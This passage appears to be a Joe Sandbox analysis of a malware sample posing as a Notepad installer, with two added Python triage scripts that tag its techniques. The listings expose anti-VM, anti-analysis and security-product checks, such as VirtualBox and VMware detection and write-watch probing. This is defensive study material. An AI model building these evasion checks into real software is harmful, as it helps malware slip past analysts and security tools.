                                      • Instruction Fuzzy Hash: AB313876E01219AFCB10DB95C944DEFBBBEEF48700B1040A9F516E7290DB719E45CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _alloca_probe.NTDLL ref: 006E3CC2
                                      • memcpy.NTDLL(?,?,?), ref: 006E3CCE
                                      • memset.NTDLL ref: 006E3CE3
                                      • getaddrinfo.WS2_32(?,00000000,?,00000000), ref: 006E3D06
                                      • memcpy.NTDLL(000000E0,?,?,?,00000000,?,00000000), ref: 006E3D52
                                      • htons.WS2_32(?), ref: 006E3D6F
                                      • FreeAddrInfoW.WS2_32(00000000), ref: 006E3D86
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcpy$AddrFreeInfo_alloca_probegetaddrinfohtonsmemset
                                      • String ID:
                                      • API String ID: 1797924349-0
                                      • Opcode ID: 4a636bfce9cafd1ca28561b6ccefc3f8347b8c933e92c7f7f432594b3e7901e5
                                      • Instruction ID: 86e6ab0b22d27abe1d703d717b1a374c314041cb1affd4743275edec675a1bc3
                                      • Opcode Fuzzy Hash: 4a636bfce9cafd1ca28561b6ccefc3f8347b8c933e92c7f7f432594b3e7901e5
                                      • Instruction Fuzzy Hash: 87318F75901349AFCB24DF9ACC89ADEB7BAFF44310F148459E40597212D370EE46CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$mallocmemset
                                      • String ID: IPCA$VMWARE
                                      • API String ID: 1993750426-2504121799
                                      • Opcode ID: 842a017b8561733b6f8374507291c33cfec99736fb3c785ffec11a3f809bfb2d
                                      • Instruction ID: 59c24093ec0fdf60cf5d1ab0f39b70589547ac2d47a614170600a58fc41a237f
                                      • Opcode Fuzzy Hash: 842a017b8561733b6f8374507291c33cfec99736fb3c785ffec11a3f809bfb2d
                                      • Instruction Fuzzy Hash: B411B471902385BFEB1167E68C45BEE767BDF45330F200059FA01B2281D7754B029AA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FirmwareSystemTablememset$??3@mallocrealloc
                                      • String ID:
                                      • API String ID: 920115187-0
                                      • Opcode ID: b28ecc184075fc7d53ce4974af864b9e6d16f4a0981ca591aca3228bfaa0c98c
                                      • Instruction ID: 6515fa83ce59c057def571f56ec8608844e17a9d4f954c02d90ef35a4db8e4dd
                                      • Opcode Fuzzy Hash: b28ecc184075fc7d53ce4974af864b9e6d16f4a0981ca591aca3228bfaa0c98c
                                      • Instruction Fuzzy Hash: 7511A1766023967FE7211FA7EC48EDB3E5FEF857A1B104029F90892211DB718C04C6B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetProcAddress.KERNEL32(?,ZwQueryInformationProcess), ref: 006E6093
                                      • VirtualProtect.KERNEL32(00000001,00000004,00000040,?,006E603C,00000000,?,?,?,?), ref: 006E60DB
                                      • InterlockedExchange.KERNEL32(?,<`n), ref: 006E60EA
                                      • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,?,?,?,?,00000000), ref: 006E60FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProtectVirtual$AddressExchangeInterlockedProc
                                      • String ID: <`n$ZwQueryInformationProcess
                                      • API String ID: 1726986358-2338439428
                                      • Opcode ID: d461bd97d739b06b06ae51ea06364af8e2cc7e452872e8901b3e2618bebf127f
                                      • Instruction ID: 35ea8469872ec6245a7d957639248414e56266c2412d8d0adefc661f4c56b01e
                                      • Opcode Fuzzy Hash: d461bd97d739b06b06ae51ea06364af8e2cc7e452872e8901b3e2618bebf127f
                                      • Instruction Fuzzy Hash: B301803220125ABBDF214FA6CD45FEA3F6AEB64790F040025FA18962A0D672D961CBD4
                                      Uniqueness

                                      Uniqueness Score: -1.00%
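
                                      The function entries above (token integrity-level query, lstrcmpiW against security-product driver names, MEM_WRITE_WATCH allocation checked with GetWriteWatch, WMI lookup of PCI\VEN_80EE&DEV_CAFE, the IPCA/VMWARE firmware-table strings, and the VirtualProtect/InterlockedExchange write after resolving ZwQueryInformationProcess) are the raw material an analyst turns into indicators. The helper below is an added example, not code from the original report or from Joe Sandbox: it parses entries in this listing format, tags the evasion and reconnaissance techniques they reveal, and decodes the short "strings" (such as `<`n`) that are really 4-byte immediates the report printed as text. The SAMPLE text is constructed from entries on this page; the REGIONS address windows are assumptions, since the report does not give the size of the 0x006E0000 region.

```python
"""Triage helper for Joe Sandbox function entries like the ones above.
Added example for this page (not the report's or Joe Sandbox's code): tags the
evasion/recon techniques visible in the API and 'String ID' lines and decodes
short 'strings' that are really 4-byte immediates. SAMPLE is constructed from
entries on this page; REGIONS are assumed address windows."""
import re
import struct

# Constructed sample; a 'Uniqueness Score' line closes each entry, as in the report.
SAMPLE = r"""
• GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?,?,?,00000000,?,?,006E4238,00000000), ref: 006E42F2
• ??3@YAXPAX@Z.MSVCRT ref: 006E4341
• String ID:
Uniqueness Score: -1.00%
• lstrcmpiW.KERNEL32(?,360SelfProtection), ref: 006EC8EB
• String ID: 360SelfProtection$BdDci$klkbdflt$rtp_process_monitor
Uniqueness Score: -1.00%
• VirtualAlloc.KERNEL32(00000000,01000000,00203000,00000040), ref: 006EA331
• GetWriteWatch.KERNEL32(00000000,00000000,00001000,?,?,?), ref: 006EA3B1
• String ID:
Uniqueness Score: -1.00%
• Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
• StrStrIW.SHLWAPI(?,PCI\VEN_80EE&DEV_CAFE), ref: 006EB7FC
• String ID: DeviceId$PCI\VEN_80EE&DEV_CAFE$ROOT\CIMV2$SELECT * FROM Win32_PnPEntity
Uniqueness Score: -1.00%
• String ID: IPCA$VMWARE
Uniqueness Score: -1.00%
• GetProcAddress.KERNEL32(?,ZwQueryInformationProcess), ref: 006E6093
• VirtualProtect.KERNEL32(00000001,00000004,00000040,?,006E603C,00000000,?,?,?,?), ref: 006E60DB
• InterlockedExchange.KERNEL32(?,<`n), ref: 006E60EA
• String ID: <`n$ZwQueryInformationProcess
Uniqueness Score: -1.00%
"""

CALL_RE = re.compile(r"^•\s*(?:Part of subcall function \w+:\s*)?(?P<api>\S+?)\.(?P<mod>\w+)"
                     r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
STR_RE = re.compile(r"^•\s*String ID:\s*(?P<ids>.*)$")
AV_DRIVERS = {"360SelfProtection", "BdDci", "klkbdflt", "rtp_process_monitor"}
MEM_WRITE_WATCH = 0x00200000  # VirtualAlloc flag; 0x00203000 above = COMMIT|RESERVE|WRITE_WATCH
# Assumed windows for the two dump sources: the image at 0x00400000 (dumps listed up to
# 0x42B000) and the region at 0x006E0000, whose size the report omits (128 KiB assumed).
REGIONS = {"image 0x00400000": (0x00400000, 0x0042C000),
           "region 0x006E0000": (0x006E0000, 0x00700000)}


def parse_entries(text):
    """Split a listing into per-function entries: {'apis', 'strings', 'calls'}."""
    entries, apis, strings, calls = [], set(), set(), []
    for raw in text.splitlines():
        line = raw.strip()
        if m := STR_RE.match(line):
            strings |= {s for s in m["ids"].split("$") if s}  # '$' joins the strings
        elif m := CALL_RE.match(line):
            apis.add(m["api"])
            calls.append((m["api"], m["args"] or "", int(m["ref"], 16)))
        elif line.startswith("Uniqueness Score"):
            entries.append({"apis": apis, "strings": strings, "calls": calls})
            apis, strings, calls = set(), set(), []
    return entries


def _hex(arg):
    try:
        return int(arg, 16)
    except ValueError:
        return None  # '?' or a symbolic argument


def classify(entry):
    apis, strings, calls = entry["apis"], entry["strings"], entry["calls"]
    tags = []
    if any("VEN_80EE&DEV_CAFE" in s for s in strings):
        tags.append("anti-vm: VirtualBox guest device (PCI vendor 80EE, device CAFE) via WMI Win32_PnPEntity")
    if {"IPCA", "VMWARE"} <= strings:
        # 'IPCA' is the dword 'ACPI' (GetSystemFirmwareTable provider) read as little-endian bytes.
        tags.append("anti-vm: 'VMWARE' searched in ACPI firmware tables")
    if "lstrcmpiW" in apis and strings & AV_DRIVERS:
        tags.append("recon: security-product driver names compared: " + ", ".join(sorted(strings & AV_DRIVERS)))
    watch = any(api == "VirtualAlloc" and (_hex(args.split(",")[2]) or 0) & MEM_WRITE_WATCH
                for api, args, _ in calls if args.count(",") >= 2)
    if watch or "GetWriteWatch" in apis:
        tags.append("anti-analysis: MEM_WRITE_WATCH allocation inspected with GetWriteWatch")
    if "ZwQueryInformationProcess" in strings and {"VirtualProtect", "InterlockedExchange"} <= apis:
        tags.append("hooking: ZwQueryInformationProcess resolved, then a dword written under "
                    "PAGE_EXECUTE_READWRITE (VirtualProtect + InterlockedExchange)")
    if any(api == "GetTokenInformation" and "TokenIntegrityLevel" in args for api, args, _ in calls):
        tags.append("recon: process integrity level read from the access token")
    return tags


def immediates(strings):
    """Short printable 'strings' that decode to addresses inside REGIONS.
    '<`n' is bytes 3C 60 6E 00, i.e. 0x006E603C little-endian: the same address
    the VirtualProtect call in that entry receives."""
    found = {}
    for s in strings:
        if 2 <= len(s) <= 4 and s.isascii() and s.isprintable():
            val = struct.unpack("<I", s.encode("ascii").ljust(4, b"\0"))[0]
            for name, (lo, hi) in REGIONS.items():
                if lo <= val < hi:
                    found[s] = (val, name)
    return found


def analyze(text):
    return [(classify(e), immediates(e["strings"])) for e in parse_entries(text)]


if __name__ == "__main__":
    for n, (tags, imms) in enumerate(analyze(SAMPLE)):
        print(f"entry {n}: {tags or ['no tag']}; immediates: "
              + ", ".join(f"{s!r}->{v:#010x} ({r})" for s, (v, r) in imms.items()))
```

The `$` separator is ambiguous if a function's own string contains `$`, and a decoded immediate is only reported when it falls inside one of the assumed windows, so treat the region bounds as something to adjust from the actual dump sizes before relying on the pointer heuristic.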

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(00000104,?,00000000,00020019,?,00000004,8Uo), ref: 006EB437
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000104), ref: 006EB454
                                      • StrStrIW.SHLWAPI(?,?), ref: 006EB468
                                      • RegCloseKey.ADVAPI32(?), ref: 006EB475
                                      • RegCloseKey.ADVAPI32(?), ref: 006EB483
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$OpenQueryValue
                                      • String ID: 8Uo
                                      • API String ID: 1607946009-3489183970
                                      • Opcode ID: 756d7c7f59d8fc1e13ad0f3b87325f1a4abc5fea0589d82995314894780a5329
                                      • Instruction ID: 44e3b651c817819eb920be0a5453e1d125967821fc77ca418af026ce56e75ad7
                                      • Opcode Fuzzy Hash: 756d7c7f59d8fc1e13ad0f3b87325f1a4abc5fea0589d82995314894780a5329
                                      • Instruction Fuzzy Hash: A211393260121AFBDF518FA1DC08AEB7BBAFF04354F109465F945E1160EB309A94DB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: cache-diges$content-typ$max-forward$pEo
                                      • API String ID: 1475443563-637431819
                                      • Opcode ID: 9b2f6c2803e0ffd616f5e8db17542ad13300aeb5bc492c96aecc645fdd236d64
                                      • Instruction ID: e8e1098fa1c0133cfca9d7e744a13c53b669f08bf96e9c445a3e0888f3a5d57c
                                      • Opcode Fuzzy Hash: 9b2f6c2803e0ffd616f5e8db17542ad13300aeb5bc492c96aecc645fdd236d64
                                      • Instruction Fuzzy Hash: 58F08C5575E3C431D274963B1D42B7B2E4B6B5176AF050AA5FE44EC383EA82CE034140
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,006E2BCD), ref: 006E35B3
                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E35BF
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,006E2BCD), ref: 006E35D2
                                      • IsWow64Process.KERNEL32(00000000,?,006E2BCD), ref: 006E35D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleModuleProcWow64
                                      • String ID: IsWow64Process$kernel32.dll
                                      • API String ID: 1745181078-3024904723
                                      • Opcode ID: 9c4c362748a2a59ea45f03a05671e1191ac086f8e51d501c3a0f718aedd86ca6
                                      • Instruction ID: d9db0f9123b53722c86b97e14686459c0d969e56602fb1c02a2f75ccebc64d6d
                                      • Opcode Fuzzy Hash: 9c4c362748a2a59ea45f03a05671e1191ac086f8e51d501c3a0f718aedd86ca6
                                      • Instruction Fuzzy Hash: 79F01C71601359ABDB118FAAEC0D7AA37EAA70070AF406455F541D2390DBB4CA40CA10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.NTDLL ref: 006F28EA
                                      • strchr.NTDLL ref: 006F292F
                                      • strchr.NTDLL ref: 006F2945
                                      • memcpy.NTDLL(00000017,?,00000010,?,?,?,006F27F7,00000017,006F168C,?,006F168C,00000017), ref: 006F2A54
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strchr$memcpymemset
                                      • String ID: 0123456789ABCDEF$0123456789abcdef
                                      • API String ID: 2695381868-885041942
                                      • Opcode ID: 37036d20a617368432501d7a6342f37571cc3925339b5736c659cd42f789eb72
                                      • Instruction ID: 1410029ab08303328b02573a84165651a7b6d3d6d506b397460f2ce1efc7e17c
                                      • Opcode Fuzzy Hash: 37036d20a617368432501d7a6342f37571cc3925339b5736c659cd42f789eb72
                                      • Instruction Fuzzy Hash: 53518C3190025F9BCF25CFA9C8A05FEBBB6EB95324F14406AD685A7341D7709A85CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00004000,00003000,00000004), ref: 006EA05E
                                      • VirtualAlloc.KERNEL32(00000000,01000000,00203000,00000004), ref: 006EA074
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA085
                                      • GetWriteWatch.KERNEL32(00000000,00000000,00001000,?,?,?), ref: 006EA0AB
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA0D7
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006EA0DD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Free$Alloc$WatchWrite
                                      • String ID:
                                      • API String ID: 2642962992-0
                                      • Opcode ID: d31573e06960b24a08c5f45eab37922f2cae3fb4308f946d0af708343d1974b5
                                      • Instruction ID: b672967bbe1b90b97d042a0ea69597de19ff5e037a1adfceec8b5f953579a62e
                                      • Opcode Fuzzy Hash: d31573e06960b24a08c5f45eab37922f2cae3fb4308f946d0af708343d1974b5
                                      • Instruction Fuzzy Hash: 1E11C671A00348BBDB219BA58C45FAF7FBEEB88744F208455F601B21C0DAB06E01DF25
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.NTDLL ref: 006E6902
                                      • VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000002), ref: 006E6930
                                      • VerifyVersionInfoW.KERNEL32(00000000,00000002,00000000), ref: 006E6949
                                      • VerSetConditionMask.NTDLL(?,00000000,00000002,00000001), ref: 006E695C
                                      • VerSetConditionMask.NTDLL(00000000,?,00000001,00000002), ref: 006E6964
                                      • VerifyVersionInfoW.KERNEL32(00000000,00000003,00000000), ref: 006E6971
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$InfoVerifyVersion$memset
                                      • String ID:
                                      • API String ID: 717955072-0
                                      • Opcode ID: 615d97cc650fa6926bc2dac0601d4900cb8e853fc751ce95053200c3a531bedf
                                      • Instruction ID: 02a120ddb8f7dd9ca5efd4f5a49cdd2a1c69c113bc5b87a90ff8f9d1b077d525
                                      • Opcode Fuzzy Hash: 615d97cc650fa6926bc2dac0601d4900cb8e853fc751ce95053200c3a531bedf
                                      • Instruction Fuzzy Hash: 391133B2E403187BEB209B65DC06FDA7BBDAB48710F0044A6B648EB1C1D6B09A548F94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: XJo$`Jo$http:$https:
                                      • API String ID: 1475443563-3692409251
                                      • Opcode ID: 3bd913136fa5b36a979939edbb7384a75980492ab97387d5362a9100323568d8
                                      • Instruction ID: abf2c985349e4296557c64387ace9154d5656fb79794e7a14ec3db6c9b419cf7
                                      • Opcode Fuzzy Hash: 3bd913136fa5b36a979939edbb7384a75980492ab97387d5362a9100323568d8
                                      • Instruction Fuzzy Hash: 4FF0E9319053906EC250DE2EDC41B7BB3EB6B81710F024429FE1CE7246EB70EC0A8676
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: malloc$callocmemcpy
                                      • String ID:
                                      • API String ID: 258562675-0
                                      • Opcode ID: 7bc7ee0a0ce9abe937728008df5534e06bbb984e703addabb81682a630baa7bd
                                      • Instruction ID: 4a2de19946ac4d64cba486b2855c882687a4ee0d90feb334a3c29af14f585094
                                      • Opcode Fuzzy Hash: 7bc7ee0a0ce9abe937728008df5534e06bbb984e703addabb81682a630baa7bd
                                      • Instruction Fuzzy Hash: A6D19AB4A087419FC714DF29C184A5BBBE1FF89344F51892EE989A7350E738E854CF86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: 4Do$PEo$content-dispositio$if-unmodified-sinc
                                      • API String ID: 1475443563-2677543615
                                      • Opcode ID: f9c52bbf97889fe126d8f427d0394a7ac582c2ef583e55cc5ab1e9810324cb5c
                                      • Instruction ID: eb78aefe7c84849275896ac020defa50e5cbf3dbd6370344d0224b6ad91ba3c8
                                      • Opcode Fuzzy Hash: f9c52bbf97889fe126d8f427d0394a7ac582c2ef583e55cc5ab1e9810324cb5c
                                      • Instruction Fuzzy Hash: 3BE0261878E3C831C664652A1C82BF71F4B2F61326F4004A6FE449D3C3E641CC436040
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 006E952C
                                      • VerSetConditionMask.NTDLL(00000000), ref: 006E9530
                                      • VerSetConditionMask.NTDLL(00000000), ref: 006E9534
                                      • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 006E955D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$InfoVerifyVersion
                                      • String ID: $Bn
                                      • API String ID: 2793162063-2822788854
                                      • Opcode ID: 9239b5f2eeaae4e68017a27718b0482bb3588e363880a0e2f41c3b9b7858d6a3
                                      • Instruction ID: e3e5dd042d3d1b7bc455cf33468e91bc42521491e8e048e8a8b2ca79ddab5918
                                      • Opcode Fuzzy Hash: 9239b5f2eeaae4e68017a27718b0482bb3588e363880a0e2f41c3b9b7858d6a3
                                      • Instruction Fuzzy Hash: EA112871D4061DBADB24DF65DC16BEABAB8EF98700F008499A209E7190E6B05780CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%
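
The "String ID" entries in the blocks above mix two kinds of token. Literals such as WQL, http: and https: are real strings. The three-character tokens (8Uo, pEo, 4Do, PEo, XJo, `Jo, $Bn) are not: read as little-endian bytes with a zero high byte they give 0x006F5538, 0x006F4570, 0x006F4434, 0x006F4550, 0x006F4A58, 0x006F4A60 and 0x006E4224, all inside the 0x6E0000 region the dumps come from, which is consistent with immediate pointer operands that the IDA plugin picked up as strings. The header names are short by one character (cache-diges, content-typ, max-forward, content-dispositio, if-unmodified-sinc) because the matching code switches on the length and the last byte and then memcmp()s the first len-1 bytes, the shape of generated header-token lookups (h2o's token table is one such generator and includes cache-digest), so the decompiler only ever sees the len-1 prefix. The script below is an added triage helper, not part of the Joe Sandbox report; the dump size bound and the header list it resolves against are assumptions, and the input lines are copied from the report.

```python
"""Sort the 'String ID' tokens of this report into pointer residue, truncated
header-name prefixes and ordinary strings.  Added triage helper, not Joe
Sandbox code; the dump size bound and the header list are assumptions."""
import re

# The dumps these strings come from start at 0x006E0000 (Memory Dump Source
# lines).  The end is an assumption chosen to cover every ref: address seen.
DUMP_BASE, DUMP_END = 0x006E0000, 0x00700000

# Header names to resolve prefixes against (constructed list; a real pass would
# use the token list of the HTTP library the sample embeds).
KNOWN_HEADERS = ["cache-digest", "content-type", "max-forwards", "content-disposition",
                 "if-unmodified-since", "if-modified-since", "content-length", "user-agent"]

# 'String ID' lines copied from the report blocks above.
REPORT_STRING_LINES = [
    "• String ID: 8Uo",
    "• String ID: cache-diges$content-typ$max-forward$pEo",
    "• String ID: XJo$`Jo$http:$https:",
    "• String ID: 4Do$PEo$content-dispositio$if-unmodified-sinc",
    "• String ID: $Bn",
    "• String ID: WQL",
]

def parse_string_id(line):
    """Split the '$'-joined token list.  An empty piece means the token itself
    begins with '$' (the report shows '$Bn'), so glue the separator back on."""
    m = re.search(r"String ID:\s*(.*)$", line)
    if not m:
        return []
    parts, toks, i = m.group(1).split("$"), [], 0
    while i < len(parts):
        if parts[i] == "" and i + 1 < len(parts):
            toks.append("$" + parts[i + 1])
            i += 2
        else:
            if parts[i]:
                toks.append(parts[i])
            i += 1
    return toks

def as_pointer(token):
    """Three printable bytes such as '8Uo' are the low bytes of a little-endian
    dword with a zero high byte.  Return that address if it lies in the dump."""
    if len(token) != 3:
        return None
    addr = int.from_bytes(token.encode("latin-1"), "little")
    return addr if DUMP_BASE <= addr < DUMP_END else None

def prefix_table(names):
    """Emulate a generated header lookup: key on (length, last byte), store the
    first len-1 bytes.  Those stored prefixes are the literals a decompiler
    sees, which is why the report shows 'content-typ', not 'content-type'."""
    table = {}
    for n in names:
        table.setdefault((len(n), n[-1]), []).append(n[:-1])
    return table

def lookup(table, name):
    """Match a header name the way the generated code does: switch on length
    and last byte, then memcmp() the first len-1 bytes."""
    for prefix in table.get((len(name), name[-1:]), []):
        if name[:-1] == prefix:
            return prefix + name[-1]
    return None

def resolve_prefix(token, names=KNOWN_HEADERS):
    """Full header names whose (len-1)-byte prefix is this token."""
    return [n for n in names if len(n) == len(token) + 1 and n.startswith(token)]

def triage_strings(lines):
    """Map every token in the given report lines to a verdict string."""
    out = {}
    for line in lines:
        for tok in parse_string_id(line):
            ptr = as_pointer(tok)
            full = resolve_prefix(tok)
            if ptr is not None:
                out[tok] = f"pointer 0x{ptr:08X} (not a string)"
            elif full:
                out[tok] = "header prefix of " + "/".join(full)
            else:
                out[tok] = "string"
    return out

if __name__ == "__main__":
    for tok, verdict in triage_strings(REPORT_STRING_LINES).items():
        print(f"{tok!r:24} {verdict}")
```

prefix_table() and lookup() are there to show the mechanism rather than to parse the report: feed lookup() a full header name and it succeeds only when the stored len-1 prefix and the last byte both match, exactly what the memcmp calls in the report do.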

                                      APIs
                                      • SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                      • SysAllocString.OLEAUT32(?), ref: 006E936C
                                      • SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                      • SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree
                                      • String ID: WQL
                                      • API String ID: 344208780-1249411209
                                      • Opcode ID: 7422a48a79fa459153e1dd5f9afc619b76772ce812176ce9642cd6fbdf2ed443
                                      • Instruction ID: 128782bc95ec668523a522cd03951c4df7848750ef47e8e77443e17224e43ccb
                                      • Opcode Fuzzy Hash: 7422a48a79fa459153e1dd5f9afc619b76772ce812176ce9642cd6fbdf2ed443
                                      • Instruction Fuzzy Hash: A9010531201249AFDB10DF9ADC88BAA7BBAEF88755F100069F9059B350CB71AC11CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E98DD: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,006EB5D1), ref: 006E98F3
                                        • Part of subcall function 006E98DD: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E98FF
                                        • Part of subcall function 006E98DD: GetCurrentProcess.KERNEL32(00000000,?,?,006EB5D1), ref: 006E9912
                                      • ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 006EC75B
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000000), ref: 006EC770
                                      • PathCombineW.SHLWAPI(?,?,?), ref: 006EC78B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
